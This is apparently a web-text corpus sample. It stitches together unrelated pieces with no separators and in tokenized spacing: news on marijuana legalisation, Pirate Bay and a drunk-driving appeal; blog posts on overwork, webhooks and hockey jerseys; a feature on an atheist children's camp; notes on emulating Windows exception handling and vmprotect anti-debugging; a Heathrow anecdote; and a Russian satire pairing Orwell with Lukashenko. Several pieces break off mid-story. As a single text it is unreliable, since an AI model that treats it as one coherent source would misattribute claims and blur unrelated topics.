But marijuana advocates say actual income could be much higher .
" All these figures are approximations .
We are dealing with a commodity that has been illegal for decades , " said Bruce Mirken of the MPP .
" It is n't traded on the commodities market , and we have no way of knowing how much is consumed .
Everything is confused because at present we have this illusion of illegality . "
Lawyers would also be likely to benefit from any attempt to legalise the drug .
Though marijuana is supposedly available to any Californian who can find a doctor willing , for a small fee , to sign a piece of paper claiming they suffer from a condition such as insomnia or " anxiety " , it remains verboten under federal law .
Many dispensaries were warily tolerated by federal authorities under the Bush regime , and Barack Obama 's Attorney General Eric Holder has said the new administration will tolerate medical marijuana so long as it follows State law .
But the White House has not outlined its position on full legalisation , raising the spectre of a test lawsuit .
Culturally , the drug can also be highly divisive : away from major cities such as Los Angeles and San Francisco , and some northern regions where hippy culture remains commonplace , local authorities in many small towns are less than tolerant towards users .
A record 74,000 people were prosecuted for possession in 2007 , the last year for which figures are available .
The reluctance of some conservative classes to embrace legalised marijuana prompted several television stations , including KTLA and KABC , to drop Ms Herndon 's advertisement last night , apparently fearing it might offend viewers .
The MPP accused them of " stifling open debate " .
Spread the love
Working too many late nights makes you socially retarded
This Monday , we released the first of several stages in a 6 - month upgrade project to a big ERP system .
As with any software project , it was a big rush at the end , but particularly so this time because I was lead , and we were doing a lot of architectural improvements ( which I will talk about here in a series of articles over the next few weeks ) .
Anyway , in the race for the deadline , I worked late nights and weekends for sixteen days in a row .
The stress was fine , because I was really enjoying the work , but by the end , I found I could hardly hold a conversation with someone about anything other than the project itself .
It was as if all my social skills had somehow been sapped — the mind was willing , but the tongue had nothing to talk about .
I ’ve never experienced such a thing before , and it was pretty strange .
It ’s important not to neglect your social life when you ’re working overtime to finish a project .
It ’s very easy to start saying no to parties and spending time with your friends , believing you ’re doing a good thing by having early nights and recharging your batteries .
My advice to you is DON’T .
You need the distraction right now more than ever .
The Associated Press reports :
MADISON , Wis .
An Illinois teen knew he was too drunk to drive home after a Dave Matthews Band concert south of Milwaukee .
So he fell asleep in his car , only to be awoken by a state trooper .
Travis Peterson , 19 , of Dixon , Ill. , said even though he told the officer he was drunk and sleeping it off , the trooper ordered him to leave because the lot was being cleared .
Once out of the parking lot , Peterson was arrested for drunken driving .
He was subsequently found guilty and ordered to spend 60 days in jail .
A Wisconsin appeals court on Wednesday commended Peterson for doing the right thing by trying to sleep it off , and said the trial court was wrong not to let him argue that police had entrapped him .
— ICETHETICS EXCLUSIVE —
We 're less than a week away from the official unveiling of Team USA 's jerseys for the 2010 Winter Games in Vancouver .
And while I have n't yet come across a date for Team Canada 's Olympic sweaters , I do have a first look for Icethetics readers .
Team Canada 's 2010 Olympics red sweater
Kind of what a lot of fans were expecting .
Classic , old - time hockey feel .
Very impressive .
Same with the white ones .
Team Canada 's 2010 Olympics white sweater
The red shoulder yoke keeps the sweater from looking washed out .
Now you 're probably all wondering about that odd - looking crest , wanting a closer view .
Check this out .
Team Canada 's 2010 Olympics sweater crest
The subtle nod to the style of the Vancouver Olympics artwork all but makes these jerseys perfect .
I 'm no Canadian so I want to know what you guys think of these .
By the way , for those not in the loop , the reason this was such a big deal is that with the announcement that national federation logos would no longer be permitted as crests on Olympic jerseys ( i.e. : Hockey Canada , USA Hockey , etc. ) , many wondered what the new sweaters would look like .
Now you know .
The internet has been dead and boring for a while now .
It has reached a point of stability where flashes of technological creativity are rare , but every now and then some new technology can put a spark back in the ole gal ( no sexism intended ) .
If you have n’t heard of WebHooks or PubSubHubBub its about time you did .
Both are designed to simplify and optimize the web .
Webhooks let applications talk to each other using very simple HTTP .
Webhook enabled applications run ( so far ) on app hosting sites in the cloud .
What makes them different is that they constantly scan for POSTS to a designated URL .
To use the application , you register your application with the other webhook enabled application and provide a callback URL .
You POST data from your app to the url of the receiving app , and monitor the callback URL for its response .
Your app then takes the POST it received and processes it .
I will give you a simple example .
Your accountant sets up an app for all their customers that has all the sales tax rules for every community in every state .
Every time your company makes a sale , your oline store application sends the transaction ID , amount of taxable goods and the long zip code where the sale was made .
The webhooks enabled app receives it , calculates the correct salestax and immediately sends back the result to your online store which incorporates the local sales tax information it received in the invoice as the customer checks out .
This is a very simple example of using Webhooks , you will be able to come up with much better .
Pubsubhubbub ( PSHB ) is a realtime , multicasting webhooks enabled publish and subscribe system .
Historically on the net , most information is received after it is pulled .
For example , we set up receive intervals for our email .
Our browsers update our RSS feeds at pre determined intervals .
We repeat the same searches over and over , just looking to see if there is anything new .
Even when we get alerts for new email or information , the alerts are generated by actively polling the source .
PSHB changes that .
The PSHB hubs are cloud based distribution centers .
Publishers choose to distribute their data through any number of publicly availabe hubs .
Subscribers choose to receive their “ subscriptions ” or data through the Hub .
The beauty of the hub and why this makes sense is because the HUB multicasts the data to each publishers ’ subscribers , is easily scalable and it distributes to subscribers in realtime .
Every time a publisher has something new it can post the data to the PSHB , which knows who that publishers ’ subscribers are and immediately multicasts the new data to all the subscribers .
In real time .
The implications and opportunities to change business on the web , and actually to any device that can subscribe to the HUBs are huge .
This could be an open door for the content business .
For instance , currently aggregators have to get their news the old fashioned way , through RSS feeds and news alerts that they retrieve throughout the day .
That is not realtime news .
Using The Associated Press as an example , AP could post their stories to a HUB .
In realtime , the HUB can update member websites so that they will always have information first , before any aggregator .
It may not take long for aggregators to recognize the new data on the member sites , but they wo n’t have it first .
The New York Times could do the same thing .
Subscribers could get everything first , in realtime .
Then after some delay which might be 1 minute , it might be 30 minutes depending on what the paper thinks is the value related to timeliness , it could post on the website and on twitter and facebook as updates .
Would NY
Times online readers pay $ 1 a month to be guaranteed that they get their news first , before anyone else ?
I dont know .
In the sports world , text based play by play websites could be updated in realtime rather than pulling every 30 seconds or requiring the user to hit refresh every few seconds .
Huge databases can talk to huge databases and exchange data more efficiently , hopefully increasing the value of the information .
Medical databases , crime databases , any database hosted by different organizations could use webhooks and HUBS to agree to keep each other up to date .
This is all JUST beginning .
Its all brand spanking new .
Already extensions like Superfeedr are starting to appear , designed to scale .
Dive in and take advantage of the opportunity , ignore it at your own peril
m
Camp faithless :
Is Britain 's first atheist summer camp harmless fun or should we be worried ?
You might have been forgiven for thinking the BBC was introducing a new presenter of one of its ' yoof ' shows .
Small , mousey - haired , personable Samantha Stein was given prominent airtime right across the BBC network yesterday to talk about a children 's summer camp with a difference that she has set up in Britain .
For Ms Stein has an axe - a very big one - to grind .
She is an atheist who believes that traditional faith - based summer camps are bad for young minds .
So she has set up her own version , where children are encouraged to reject traditional religious teachings .
Around Ms Stein , 23 , was a scene redolent of a Scout or Guide camp .
In a lush , green corner of Somerset , Army - style tents were scattered in a clearing among trees .
In the middle , makeshift log benches surrounded the compulsory , rock - ringed camp fire where , in the evening , the flames would play a merry dance across the circle of young faces .
Fireside chat : Children at Camp Quest in Somerset
This is not a modern take on Swallows And Amazons .
Kumbaya is not sung here and the closest there is to a game is Hunt The Unicorn , of which more later .
No , here at Camp Quest the hymn of choice is John Lennon 's Imagine , with its opening line : ' Imagine there 's no heaven . '
Welcome to Britain 's first atheist summer camp for children aged between eight and 17 .
Camp Quest - which stands for ' Question , Understand , Explore , Search and Test ' - is supported by some of Britain 's leading atheists .
Not surprisingly , the nation 's most prominent unbeliever , Richard Dawkins , a former professor for the public understanding of science at Oxford University , is among them .
The organisers insist that the week - long course at the Mill on the Brue outdoor activity centre will encourage youngsters to develop an open mind and their own belief system .
But others fear that it is little more than an attempt to indocrinate children with atheist views , closing their minds to all forms of organised religion .
Billed as ' the first residential summer camp for the children of atheists , agnostics , humanists , freethinkers and all those who embrace a naturalistic rather than supernatural world view ' , Camp Quest UK this week opened its tent flaps to 24 children .
With the motto ' It 's Beyond belief ' , its organisers hope to provide an alternative to traditional faith - based breaks , such as those run by the Scouts and local church groups .
Parents are paying £ 275 for their children to attend the event .
And to help get it rolling , The Richard Dawkins Foundation for Reason and Science has made a donation of £ 500 to fund a ' philosophy for children ' counsellor at the retreat .
Dawkins , author of The God Delusion , the atheists ' ' bible ' , says : ' Camp Quest encourages children to think for themselves , sceptically and rationally .
There is no indoctrination , just encouragement to be open - minded , while having fun . '
Physical activities : Children at Camp Quest enjoy some river rafting
Ms Stein , the camp director , and new darling of the BBC , is more explicit .
She says : ' I think that people are possibly getting tired of the influence that religion has in society , possibly an unearned influence , and trying to come up with alternative things that will instil values that they want to transmit to their children .
' We are not prepared to just be quiet and shut up .
We want to have our own point of view and have something for our own children . '
Ms Stein is doing a Masters degree in religion and contemporary society at King 's College , London .
Born and raised in Buckinghamshire , she is the daughter of a non-practising Lutheran mother and a father who is a non-practising Jew .
As Stein explains it , she was raised to ' make up my own mind ' .
The Camp Quest concept originated in the U.S. and Stein first read about it in the footnotes of Dawkins 's book The God Delusion while studying psychology at York University .
She was so intrigued that she organised a private visit to a Camp Quest in Michigan two years ago , where she was inspired to set up an affiliated ' mission ' in the UK .
She insists that the British camp will not take part in ' Bible - bashing ' .
It will simply be a way of encouraging children to think for themselves .
But she admits that part of that process involves ' encouraging the children to ask questions about beliefs ' .
Indoctrination ?
Organiser Sam Klein in the front of a class .
The children are encouraged to ask questions about beliefs
The British camp has , however , imported one prominent element from the original concept : a mind game centred on imaginary unicorns .
The children are told to imagine that the camp is surrounded by unicorns which cannot be seen or touched , but which are there because there has to be ' faith ' that they exist .
They are then encouraged to develop rational arguments to prove that the unicorns cannot and do not exist , with anyone who manages it awarded a prize - a £ 10 note signed by Richard Dawkins .
It does not take a genius to work out that the ' unicorns ' are , of course , an unsubtle metaphor for any ' invisible ' deity , whether Christian , Muslim or otherwise , though Ms Stein denies this is the case .
' The unicorns are not necessarily a metaphor for God , ' she says .
' They are to show kids how to think critically .
We are not trying to bash religion , but it encourages people to believe in a lot of things for which there is no evidence . '
For example , the children will also study astronomy , ' pseudo - science ' such as tarot cards , and question why horoscopes are so popular .
An expert from the Natural History Museum in London will give a talk on fossils , and a musician will perform ' sceptical scientific songs ' .
A debate on ' Can you believe what you see ? ' will look at optical illusions .
There are also physical activities such as river rafting and an assault course .
Yet the whole event is part of a growing trend that has seen prominent atheists become increasingly vocal - some would say , zealous - in their determination to spread their belief that there is no God .
Most notably , they funded a high - profile advertising campaign at the beginning of the year which saw posters on buses bearing the slogan : ' There is probably no God .
Now stop worrying and enjoy your life . '
Atheist origin : Camp Quest founder Edwin Kagin set up the first camp in 1996 after an Atheist child was banned from Scout camp
The campaign - backed by the British Humanist Association - was the brainchild of a 28 - year - old comedy writer named Ariane Sherine , who wrote a blog on the Guardian 's website criticising Christian adverts she had seen on London buses .
As part of her blog , she suggested that readers could send in £ 5 donations to help fund an atheists ' counter - campaign .
It was n't long before the proposal caught the eye of Professor Dawkins , who pledged to match any public donations up to a maximum of £ 5,500 .
In the end , there was no need for his guarantee : the fundraising campaign far exceeded expectations , raising a total of £ 136,000 from donations , which has since been used to pay for atheist adverts on London public transport and on buses across the UK , as well as for two giant digital billboards .
The question remains : why do atheists feel the need to resort to such high - profile tactics at all ?
After all , with campaigns , fundraising endeavours , a ' High Priest ' in the form of Richard Dawkins and now holiday camps for children , are n't they simply turning into a parody of the organised religions they so sneer at ?
This is a point not lost on the Church of England , which accuses Dawkins and his followers of aping religious traditions , in particular with regards to the children 's camp .
' We would defend the right for anyone to set up an event like this , as long as the young people are happy to attend , ' says a Church of England spokesman .
' But in his imitation of the type of youth events that religious groups have been running for years , Dawkins makes atheism look even more like the thing he is rallying against . '
So just where did Camp Quest originate ?
And does it encourage children to stick two fingers up at religion ?
It was the brainchild of an American , Edwin Kagin , 68 , who with his wife , Helen , held the first Camp Quest in 1996 .
An atheist lawyer from Kentucky , Kagin was angry about a case involving the Scouts , who had denied admission to a child on the basis that he was an atheist .
' The Scouts have been taken over in the U.S. by fundamentalist Christians , specifically the Mormons , ' said Kagin .
' I wanted to give non-believers a chance . '
No bible - bashing ?
Professor Richard Dawkins , pictured here by an atheist bus advert , says the camp encourages children to think for themselves
Kagin says his most uplifting moment in running the camps - which take place at six sites across the U.S. - was when an 11 - year - old girl told him that she had learned ' it is OK not to believe in God ' .
' I found that so moving , ' he said .
' She had never before known that .
It strengthens these children .
This is the first time they 've been able to talk about not believing .
Some are so relieved they cry . '
So , back in Somerset , what of the young people attending the camp ?
Among them are India Jago , 12 , and her brother , Peter , 11 , from Basingstoke , Hampshire .
They have previously been on Scout and Guide camping trips , and their father , Crispian Jago , an IT consultant , believes the experience will enrich his children .
He says : ' I 'm very keen on not indoctrinating them with religion or creeds .
I would rather equip them with the tools to learn how to think , not what to think .
I want my children to be open - minded , but not so open - minded their brains fall out .
' I would be equally happy to send them on a general summer camp purely for the physical activities - as long as I knew there was no hidden religious agenda .
' If we lived in a world where ancient myths were not afforded such reverence , then I would concede that specific non-religious camps would not be needed .
Sadly we do not yet live in such a world . '
Mr Jago also hopes his children will learn some ' basic logical philosophy and critical thinking skills - of which I have seen little evidence in their school work ' .
For his part , Richard Dawkins is adamant he does not wish to force atheism on children , and points out he has not played a significant role in the camp beyond making a modest financial contribution .
He says : ' One of my dominant motivations is an abhorrence of childhood indoctrination , of atheism just as much as of religion . '
Nevertheless , the camp is already proving controversial , not least in its implicit criticism of other faith - based children 's camps .
Jim Hammett , chief executive of Christian Camping International , says 50,000 young people a year enjoy a Christian summer camp .
' Despite comments to the contrary , they are not indoctrinated , ' he says .
' They are presented with Biblical material that they can make their own minds up about and decide whether it is something they wish to consider further .
' There is no brainwashing .
Those who do n't want to hear about a loving , caring God can choose to go to an atheist camp if they wish . '
For the Jago children , such debate remains somewhat academic .
They are more interested in the prospect of spending five nights under the stars .
Their father says : ' India and Peter are not particularly interested in atheism , they are primarily interested in the fun of camping , and in getting away from us . '
There is , however , one final irony .
Camp Quest founder Edwin Kagin has a son who not only grew up to reject his father 's philosophy , but has become a Born Again Christian minister .
He has banned his own eight - year - old son from attending any of the Camp Quest gatherings .
A salutary lesson , perhaps , for any British parents wishing to impose their own views on their children .
In my bid to emulate win32 seh ( in my emulator ) , I needed ( to test my emulator ) to single step through exception handling .
My first approach was to just single step through the program by setting the trap flag in the eflags register .
I had some problems with this .
One of the problems is single stepping through NtContinue .
Looking at the code it does a sysenter which transfers control to the kernel .
The kernel then sets the new context to have somewhere to return too .
I tried single stepping past the sysenter – the problem is however , that a single stepping exception isnt raised until it comes too the 2nd instruction of the new context.eip .
Bizarre .
Also bizarre is the fact that NtContinue changes Dr6 and Dr7 .
I had some bad code just checking for Dr6 to be non zero for a breakpoint exception , but infact while the lower 4 bits are 0 ( 1 bit for each possible breakpoint register Dr0 - Dr3 ) , the upper bits were thrashed .
Also Dr7 was changed .
Perhaps its even conceivable that there is information leakage from the kernel .
Dunno for sure .
The only solution for trapping on the first instruction following NtContinue , was setting a breakpoint on context.eip .
Therefore this requires parsing of NtContinue ’s argument ( for which there is a CONTEXT structure ) .
This is fairly straight forward .
Set a breakpoint on NtContinue , then parse the CONTEXT and set a new breakpoint on context.eip .
How do we get the breakpoint for NtContinue ?
We can do a couple of things .
1 ) resolve the symbol , and place a breakpoint on it
2 ) look at the return address of the exception handler , which eventually ends up taking you into NtContinue .
I chose 2 ) .
Both these solutions have problems if the exception handler decided to implement its own version of NtContinue .
Perhaps the best solution is to emulate down to the native api .
I did n’t implement emulation of the native api , so I ’m stuck for the time being with the partial solution .
—
In the process of partially emulating vmprotect , I came across a few calls to pushf , and popf .
These instructions push and pop the eflags register .
Initially I thought the packer might be checking to see if the trap flag was set .
It turns out it was n’t doing this check , but I none the less implemented in my tracer / debugger the ability to process pushf ’s by modifying the stack contents to have the trap flag clear .
This hack should allow my debugger to work on binaries that include this type of anti-debugging .
—
Also implemented in my emulator is processing of explicit int1 ’s in the code .
Before DbgContinue is called , I check the current instruction pointer and if its an int1 instruction , I keep note of this , and also allow the application to process the int1 by itself .
Naturally I have to set a breakpoint in the exception handler , If i still want to maintain control .
The investigator will also examine Kaupthing 's dealings with a company linked to Mr Stanford and its trading in credit default swaps ( CDS ) relating to the bank .
Mr Stanford 's company , Trenvis , is believed to have been set up by Kaupthing in the British Virgin Islands before receiving a loan of € 41.7 m ( £ 35.3 m ) from the bank .
Mr Stanford was a business associate of the Icelandic retail giant Baugur , which borrowed heavily from Kaupthing .
( AP ) --
One of the world 's largest filesharing Web sites , The Pirate Bay , is going legal through a series of give - and - take payment models that in some cases may even earn its users a bundle of cash , the new owners said Saturday .
" The more you give , the more you get , " said Hans Pandeya , chief executive of Swedish software firm Global Gaming Factory X , which announced last month it was buying the site and would start paying both content providers and copyright holders .
The change in ownership was met with skepticism by the filesharing community who feared that , by taking The Pirate Bay legal , its new operators would start charging them for downloading content such as films , music and computer games , which they had previously accessed for free .
In April , four men connected with the site were sentenced to one - year prison terms for abetting violations of copyright law , and ordered to pay a fine totaling 30 million kronor ( $ 3.8 million ) .
At least three of the men claim they have n't owned the site for years .
Pandeya said his company bought the site from a foreign company through lawyers and he does n't know who the current owners are , but that none of the prosecuted men seemed to be involved .
When the deal was announced , Pirate Bay spokesman and one of defendants , Peter Sunde , said however that he and his associates were pleased with GGF 's plans for the site since they felt they could n't take it any further - lacking both money and resources to do so .
Sunde could not be reached for comment Saturday .
Pandeya said The Pirate Bay , whose domain name and related Web sites were bought by Global Gaming Factory X for 60 million kronor , will not become like pure pay sites , such as ITunes Store and Napster .
" For the great majority it will be free of charge , for a minority it will actually make them money , and for a small portion it will cost them , " he said .
Pandeya said plans are under way to introduce a monthly fee to be able to use The Pirate Bay , but he said the fee could be worked off by , for example , sharing downloaded content or lending storage capacity to others on their PC 's in exchange .
" We know that unless we 're able to create revenues for the filesharers they 'll just move on to the next free , site , " he said .
" Filesharers are our best friends . "
Pandeya also said other give - and - take packages were in the works , but declined to elaborate , saying more details would revealed in the next few weeks .
The site , under its new management , is expected to be launched in about a month 's time .
It will also raise money through advertising and by making network data traffic cheaper and more efficient for internet service providers .
This would be done by making the filesharing more local , allowing users in the same city to be interconnected as opposed to swapping data across multiple borders .
GGF claims the site will fully address the legal issues that troubled it before because income will be distributed between filesharers , copyright holders and others involved .
Pandeya said that although no deals have been struck yet , his company is currently in negotiations with some of " the world 's largest players " within the music industry .
" It 's been positive , " he said , declining to name the companies involved in the talks .
©2009 The Associated Press .
All rights reserved .
This material may not be published , broadcast , rewritten or redistributed .
Explore further The Pirate Bay sold to Swedish gaming group
Exclusive to STR
Last week I waited for a Westbound flight to be called , from a gate in London Heathrow , and happened to sit next to a black lady , somewhat overweight , in a dark uniform .
I made conversation with , " Are you joining this flight ? "
" No , " she said , " I work here " -- meaning , presumably , Heathrow .
" I 'm a profiler . "
" Really ? " I said , in my best emulation of Hugh Grant and pretending total ignorance .
" What does a profiler do ? "
" We stand at the on -ramp as passengers board planes , and watch for any bad people . "
She went on to say that profiling there was quite intense for " America flights " , more so than for others ; at the time there were two planes nearby about to board for Cape Town and Johannesburg , but most attention was on our America flight .
Well , nobody wants to be caught in an eggshell seven miles over mid-Atlantic in the company of a bad person with explosive intent , so I could not express much against that .
But I pressed my luck and asked " How can you spot a bad person ? "
The lady spoke with that delightful sing - song accent typical of West Africans and West Indians , in this case I think Ghana , though I can't be sure since I 'm out of practice , because after not one of her sentences did she append the surplus monosyllable " Mon . "
She replied that she could n't answer that , because the techniques of profiling were secret .
" Oh go on , " I persisted , " surely you can share just one itsy - bitsy government secret with little old me ? "
She declined again , but did part with one all the same .
She hunched her shoulders , drooped her head forward and shot the furtivest glances right and left that I 've ever seen .
" We do look for people like this " she said .
It may have been a well - practiced joke , but it was funny all the same .
" You know , " I continued , " might it not be simpler just to throw out your government so that nobody is enraged enough , by what it does , to want to destroy airplanes and kill people ? "
To that she gave no reply , possibly because it contained too many radical concepts to be digested in one gulp , or possibly because she knew just what I meant but could not acknowledge , in loyalty to her employer and in eagerness to keep her job , its good sense .
I could n't tell which , but as well as being sociable and amusing she was not dumb .
At any rate , I broke the silence by changing the topic a bit .
" I 've heard , " I asked , " that Britain has more CCTV cameras watching people than any country in the world , for its size of population .
Is that correct ? "
" Oh yes , " she replied , " have n't you seen that one over there , in the fork of the column ? "
Here I 'll digress to explain that the " column " was a zany steel structure helping Terminal Five to defy gravity , angled at about 45 degrees to the vertical and having lesser tubes branching out ; the building is one of the ugliest I 've seen and its support structure reminded me a little of the Centre Georges Pompidou in Paris , except that in London the tubes are decently hidden inside the outer shell , as befits proper British reserve .
" And another there , in that column ? " she continued , " and a third , over there ?
And look across the hall , do you see those two , facing right at us ?
And up high in that wall , there 's a camera hidden in most of those lamp fittings . "
Now , I 'm not at all sure whether in that last bit she was having me on .
There were a dozen lamp fittings , presumably for spotlights to brighten things up after dusk , and they looked just like ordinary lamp fittings to me .
Why hide the cameras , when others are in the plain view of any who know where to look ?
But she kept such a straight face , I could not tell .
" Amazing , " I said .
" But how on earth do the scrutineers stay sane , while reviewing all the massive amount of videotape all these cameras produce ? "
" Oh , it does n't work that way .
There are people right now , scores of them , peering at their screens as we speak , watching us . "
She did n't use the phrase " real time " but that 's what she meant .
I indicated being suitably impressed .
An errand then called her away , but she left behind a newspaper and a colleague .
Its headlines declared that there was a " drug problem " in a British Army base in Afghanistan .
" That 's funny , " I said to the colleague .
" These lads were put through all that expensive training and loaded up with the latest lethal weapons and sent to serve the Queen where the poppies grow , and they end up trading with the locals and getting peacefully high . "
" Yes , " responded the colleague , but she lacked her companion 's ocular twinkle , so I did n't press my point .
Perhaps it was just as well , for said companion had a surprise for me : the flight was called , we arrived at the top of the ramp where she and her colleague were quietly profiling passengers , and she said to my wife " You , you can get on the plane , go , go !
But this man " ( indicating your humble servant and speaking to her colleague ) " is n't going anywhere .
He can stand over there ! "
She pronounced it " Ova there " as only a West African momma can .
We all had a good laugh , and bade her farewell , and enjoyed a good flight with no known bad people , and upon arrival were fingerprinted , face - scanned , passport - stamped and told without a hint of a smile to have a nice evening .
But before it began , I had encountered that rarest of creatures , a government employee with a sense of humor .
Безбрежны простоты Большого Интернета , а если верить всему , что пишут про белорусский интернет , то за 14 лет существования доменной зоны by было зарегистрировано чуть больше 20 000 доменных имен .
Не густо .
Зато чтобы найти драгоценность , нет особенной нужды долго искать .
Советую почитать : Лукашенко против Оруэлла .
Внимание !
Настоящая заметка не содержит авторского текста , а целиком состоит из цитат из легендарной повести Джорджа Оруэлла “ 1984 ” вперемешку с актуальными новостями Республики Беларусь ( источники – БЕЛТА , газета “ Советская Белоруссия ” и проч . ) .
Редактор материала не несет ответственности за то , как может быть понято и истрактовано ее содержание .
Выступая на параде в чест ь Дня Независимости Беларуси , Александр Лукашенко заметил , что « за последние 15 лет республике неоднократно предрекали экономический крах и социальные потрясения , но наш запас прочности достаточный » .
На фоне современных конфликтов , террористических актов , происходящих на разных континентах планеты , в Беларуси надежно обеспечиваются спокойствие и согласие в обществе , единство народа , защита от военных угроз и иных внешних вызовов .
…и , хотя светило солнце , а небо было резко голубым , все в городе выглядело бесцветным — кроме расклеенных повсюду плакатов .
С каждого заметного угла смотрело лицо черноусого .
С дома напротив тоже .
СТАРШИЙ БРАТ СМОТРИТ НА ТЕБЯ , — говорила подпись , и темные глаза глядели в глаза Уинстону .
Во время посещения редакции газеты “ Советская Белорусси я ” Лукашенко заявил : “ Анархию в интернете пора прекращать …
Не стоит допускать , чтобы интернет , это великое техническое достижение человечества превращалось в информационную помойку ” .
Александр Лукашенко заявил , что в Беларуси есть независимый интернет - портал , который является “ рупоро м даже не оппозиции , а рупором враждебных нам голосов , враждебных государств ” .
Особую обеспокоенность главы государства вызвал тот факт , что аудитория этого ресурса больше тиража “ Советской Белоруссии ” .
— Жизнью мы управляем , Уинстон , на всех уровнях .
Вы воображаете , будто существует нечто , называющееся человеческой натурой , и она возмутится тем , что мы творим , — восстанет .
Но человеческую натуру создаем мы .
Люди бесконечно податливы .
А может быть , вы вернулись к своей прежней идее , что восстанут и свергнут нас пролетарии или рабы ?
Выбросьте это из головы .
Они беспомощны , как скот .
В условиях , когда во всем мире обостряется проблема недостатка продовольствия , наш агропромышленный комплекс не только обеспечивает собственную продовольственную безопасность , но и успешно осваивает внешние рынки .
Нам уже не надо бегать по соседям с протянутой рукой в поисках продовольствия .
Мы сами предлагаем его , с выгодой для страны используя благоприятную мировую конъюнктуру .
Минувший год стал для Беларуси во всех смыслах благодатным и урожайным .
Особенно радует то , что рождаемость увеличилась на 7 процентов , а смертность сократилась почти на 5 процентов .
Это результат наших усилий по поддержке матерей и детей , охране жизни и здоровья каждого человека .
Кажется , были даже демонстрации благодарности Старшем у Брату за то , что он увеличил норму шоколада до двадцати граммов в неделю .
А ведь только вчера объявили , что норма уменьшена до двадцати граммов , подумал Уинстон .
Неужели в это поверят — через какие - нибудь сутки ?
Верят .
Парсонс поверил легко , глупое животное .
Безглазый за соседним столом — фанатично , со страстью , с исступленным желанием выявить , разоблачить , распылить всякого , кто скажет , что на прошлой неделе норма была тридцать граммов .
Темп роста валовой продукции сельского хозяйства во всех категориях хозяйств за январь — июнь 2009 года к уровню соответствующего периода 2008 года составил 106,6 процента , что на 0,3 процентного пункта выше уровня января — марта 2009 года .
В первом полугодии 2009 года в стране введено в эксплуатацию 3,09 млн.
кв. метров жилья , что является наибольшим показателем за последние 15 лет .
При этом выполнение годового задания составило 51,5 процента , а рост объемов жилищного строительства к аналогичному периоду 2008 года — 113,6 процента .
По итогам января — мая 2009 г. достигнуто повышение рентабельности реализованной продукции по сравнению с уровне м I квартала 2009 года как в целом в промышленности и строительстве , так и в системах большинства министерств и концернов .
Телекран все извергал сказочную статистику .
По сравнению с прошлым годом стало больше еды , больше одежды , больше домов , больше мебели , больше кастрюль , больше топлива , больше кораблей , больше вертолетов , больше книг , больше новорожденных — всего больше , кроме болезней , преступлений и сумасшествия .
С каждым годом , с каждой минутой все и вся стремительно поднималось к новым и новым высотам .
Уровень безработицы в стране на 1 июля 2009 года составил 0,9 процента к численности экономически активного населения .
Ситуация на рынке труда остается стабильной , управляемой , контролируемой и не выходит за рамки прогнозных показателей , массовых высвобождений и увольнений в ближайшее время не ожидается .
Статистика в первоначальном виде — такая же фантазия , как и в исправленном .
Чаще всего требуется , чтобы ты высасывал ее из пальца .
Например , министерство изобилия предполагало выпустить в 4 - м квартале 145 миллионов пар обуви .
Сообщают , что реально произведено 62 миллиона .
Уинстон же , переписывая прогноз , уменьшил плановую цифру до 57 миллионов , чтобы план , как всегда , оказался перевыполненным .
Во всяком случае , 62 миллиона ничуть не ближе к истине , чем 57 миллионов или 145 .
Весьма вероятно , что обуви вообще не произвели .
Еще вероятнее , что никто не знает , сколько ее произвели , и , главное , не желает знать .
Известно только одно : каждый квартал на бумаге производят астрономическое количество обуви , между тем как половина населени я
Океании ходит босиком .
« Вы , пожалуйста , не стучите в мою или чью - то дверь и не требуйте того политзаключенного освободить , другого .
Мы вам показываем , за что человек попал в не столь отдаленные места .
Нашли какого - то вшивого оппозиционера , полтора процента получившего на президентских выборах , и сделали его великим политзаключенным .
Так имейте в виду : если он завтра выйдет на свободу , так и оппозиции той не будет .
Неужели вы не понимаете , что это за человек ?
Святого нет в этом человеке ничего » .
Голдстейн , отступник и ренегат , когда - то , давным - давно ( так давно .
что никто уже и не помнил , когда ) , был одним из руководителей партии , почти равным самом у Старшему Брату , а потом встал на путь контрреволюции , был приговорен к смертной казни и таинственным образом сбежал , исчез .
Беларусь считала и считае т Россию своим главным союзником , подчеркнул Александр Лукашенко , и заинтересована в укреплении ее экономического потенциала и международных позиций .
“ При этом мы не можем закрывать глаза на действия и факторы , откуда бы они ни исходили , подрывающие нашу собственную комплексную безопасность ” , – добавил Президент .
По его мнению , синдром тяжеловесной “ державности ” в отношениях с близкими может привести к совершенно обратному эффект у
Партия говорит , что Океания никогда не заключала союза с Евразией .
Он , Уинстон Смит , знает , что Океания была в союзе с Евразией всего четыре года назад .
И если все принимают ложь , навязанную партией , если во всех документах одна и та же песня , тогда эта ложь поселяется в истории и становится правдой .
А когда память отказала и письменные свидетельства подделаны , тогда с утверждениями партии , что она улучшила людям жизнь , надо согласиться — ведь нет и никогда уже не будет исходных данных для проверки .
“ Тут у меня чины милицейские , 10 человек , самого высокого уровня , выстроили себе особняки .
Мне сразу об этом доложили .
Они еще не успели закончить .
Первый вопрос : кто вам отвел там земли ?
Нет внятного ответа .
« Вы , ребята , где деньги взяли на эти дворцы ?
Вы зарабатываете меньше , чем я.
Я по себе знаю , я никогда бы не построил при нынешних ценах такой особняк .
Где вы взяли деньги ? »
Ответа нет .
Принимается мгновенно решение , подписывается указ : их — с работы , особняки — государству » . ”
Это обдуманная политика : держать даже привилегированные слои на грани лишений , ибо общая скудость повышает значение мелких привилегий и тем увеличивает различия между одной группой и другой .
Очевидно , что сохранению спокойствия в ночь на 4 июля помогло поведение Президента .
Вопреки традиционным правилам безопасности , он лично отправился на место взрыва .
Вершина пирамиды — Старший Брат .
Каждое достижение , каждый успех , каждая победа , каждое научное открытие , все познания , вся мудрость , все счастье , вся доблесть — непосредственно проистекают из его руководства и им вдохновлены .
« Прошедшие « парламентские выборы » показали максимально прозрачность и демократичность нашей системы , приверженность народа избранному властью курсу .
Лукашенко подчеркнул , что Беларусь уверенно следует своим собственным курсом , в основе которого интересы всех слоев населения , а не каких - то кланов или кучки олигархов .
В Беларуси последовательно решаются вопросы построения правового государства , справедливого и открытого общества , обеспечивается социально-политическая стабильность , мир , спокойствие и порядок .
14 Years for Three Stops Chancellor 's Subway Line Opens in Berlin
After almost 14 years of construction work and 320 million euros , Berlin is taking pride in its newest metro line -- even if the U55 is a bit short .
7 Very fun games that are actually good for your brain
New to this website ?
If you enjoy playing brain games online , do n't forget to check our huge selection of free puzzles .
Prior to the emerging of Sudoku as global phenomena in 2005 , some of us have made the mistake in believing we can keep our minds sharp by merely doing crossword puzzles .
By 2009 most of us realize true cognitive fitness stems from immersing your mind in a wide variety of challenges and puzzle types .
